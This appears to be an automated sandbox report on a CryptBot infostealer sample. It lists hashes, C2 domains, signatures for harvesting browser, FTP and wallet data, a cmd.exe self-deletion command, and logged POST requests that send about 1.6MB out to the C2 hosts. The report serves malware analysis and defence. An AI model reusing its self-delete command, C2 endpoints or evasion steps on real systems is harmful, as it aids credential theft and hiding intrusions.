Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    05/12/2021, 10:54 UTC

General

  • Target

    fc0701924aed7be6e65f20c16d222ef6.exe

  • Size

    392KB

  • MD5

    fc0701924aed7be6e65f20c16d222ef6

  • SHA1

    c04d8dee265d5ed32f30f9bf466b6d2676dae4eb

  • SHA256

    82a634123b202b7960b6cc3b52125352a2006e40cc2ccf3d62c1519191981e71

  • SHA512

    eea30d68123f94587d324a58a31f51bba985bd2750607a8615f370cd2c79b73ace4ea7ec00a3e6a009118064169859f150cf5e489d587454cbaa2b0f42234aee

Malware Config

Extracted

Family

cryptbot

C2

unic12m.top

unic12e.top

Signatures

  • CryptBot

    A C++ stealer distributed widely bundled with other software.

  • Reads data files stored by FTP clients (2 TTPs)

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
  • Checks installed software on the system (1 TTP)

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry (2 TTPs, 2 IoCs)

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe (1 IoC)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\fc0701924aed7be6e65f20c16d222ef6.exe
    "C:\Users\Admin\AppData\Local\Temp\fc0701924aed7be6e65f20c16d222ef6.exe"
    1⤵
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:3380
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\rikIfNPY & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\fc0701924aed7be6e65f20c16d222ef6.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:452
      • C:\Windows\SysWOW64\timeout.exe
        timeout 4
        3⤵
        • Delays execution with timeout.exe
        PID:1916

Network

  • [US]
    DNS
    time.windows.com
    Remote address:
    8.8.8.8:53
    Request
    time.windows.com
    IN A
    Response
    time.windows.com
    IN CNAME
    twc.trafficmanager.net
    twc.trafficmanager.net
    IN A
    20.101.57.9
  • [US]
    DNS
    unic12m.top
    fc0701924aed7be6e65f20c16d222ef6.exe
    Remote address:
    8.8.8.8:53
    Request
    unic12m.top
    IN A
    Response
    unic12m.top
    IN A
    5.188.38.39
  • [RU]
    POST
    http://unic12m.top/index.php
    fc0701924aed7be6e65f20c16d222ef6.exe
    Remote address:
    5.188.38.39:80
    Request
    POST /index.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
    Host: unic12m.top
    Content-Length: 1611925
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 05 Dec 2021 10:54:45 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
  • [US]
    DNS
    unic12e.top
    fc0701924aed7be6e65f20c16d222ef6.exe
    Remote address:
    8.8.8.8:53
    Request
    unic12e.top
    IN A
    Response
    unic12e.top
    IN A
    5.188.38.39
  • [RU]
    POST
    http://unic12e.top/index.php
    fc0701924aed7be6e65f20c16d222ef6.exe
    Remote address:
    5.188.38.39:80
    Request
    POST /index.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
    Host: unic12e.top
    Content-Length: 1611908
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 05 Dec 2021 10:54:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
  • 52.109.8.21:443
    322 B
    7
  • 5.188.38.39:80
    http://unic12m.top/index.php
    http
    fc0701924aed7be6e65f20c16d222ef6.exe
    1.7MB
    36.1kB
    1112
    785

    HTTP Request

    POST http://unic12m.top/index.php

    HTTP Response

    200
  • 5.188.38.39:80
    http://unic12e.top/index.php
    http
    fc0701924aed7be6e65f20c16d222ef6.exe
    1.7MB
    24.2kB
    1111
    588

    HTTP Request

    POST http://unic12e.top/index.php

    HTTP Response

    200
  • 8.8.8.8:53
    time.windows.com
    dns
    62 B
    114 B
    1
    1

    DNS Request

    time.windows.com

    DNS Response

    20.101.57.9

  • 20.101.57.9:123
    time.windows.com
    ntp
    76 B
    1
  • 8.8.8.8:53
    unic12m.top
    dns
    fc0701924aed7be6e65f20c16d222ef6.exe
    57 B
    73 B
    1
    1

    DNS Request

    unic12m.top

    DNS Response

    5.188.38.39

  • 8.8.8.8:53
    unic12e.top
    dns
    fc0701924aed7be6e65f20c16d222ef6.exe
    57 B
    73 B
    1
    1

    DNS Request

    unic12e.top

    DNS Response

    5.188.38.39

MITRE ATT&CK Enterprise v6

Downloads

  • memory/3380-115-0x00000000007D9000-0x00000000007FF000-memory.dmp

    Filesize

    152KB

  • memory/3380-117-0x0000000000400000-0x0000000000469000-memory.dmp

    Filesize

    420KB

  • memory/3380-116-0x00000000006E0000-0x0000000000727000-memory.dmp

    Filesize

    284KB
